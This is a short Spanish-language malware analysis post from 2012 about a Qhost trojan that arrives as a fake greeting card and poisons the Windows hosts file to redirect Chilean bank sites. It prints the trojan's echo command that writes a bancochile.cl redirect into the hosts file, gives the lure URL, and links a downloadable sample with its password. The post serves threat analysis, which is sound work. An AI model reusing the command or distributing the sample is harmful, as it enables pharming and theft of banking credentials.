Qhost: Amor en Linea - postal de Cinthia Rojas‏.

Hoy les traigo un simple, pero efectivo, troyano Qhost. Siempre utilizando la ingeniería social como elemento principal para la infección de las victimas. 

En este caso afecta a varios sitios populares de Internet y entidades bancarias de Chile.

Link:
hxxp://184.82.146.86/gusanito/esp/tarjetas/postales/amistad/postal_gusanito.exe


Este nos descarga a un ejecutable que esta compactado con UPX

Descomprimimos fácilmente con UPX -d archivo.exe

Y a simple vista con un editor Hexadecimal podemos observar el Pharming.

Por lo que se observa el troyano genera un archivo .bat para luego con el, hacer un inclusión de lineas al archivo .hosts

echo 184.82.146.86 http://bancochile.cl >> %windir%\system32\drivers\etc\hosts

(En la imagen puede verse los sitios afectados por el troyano)

Luego de la modificación del archivo host, abre una web de gusanito.com para despistar

start http://www.gusanito.com/esp/tarjetas/postales/amistad/faltas_sobre_la_arena/937

Muestra (original + sin UPX) http://www.mediafire.com/?yklxyexzch4c5vg

Password = infected

Es todo por el momento.

@Dkavalanche  2012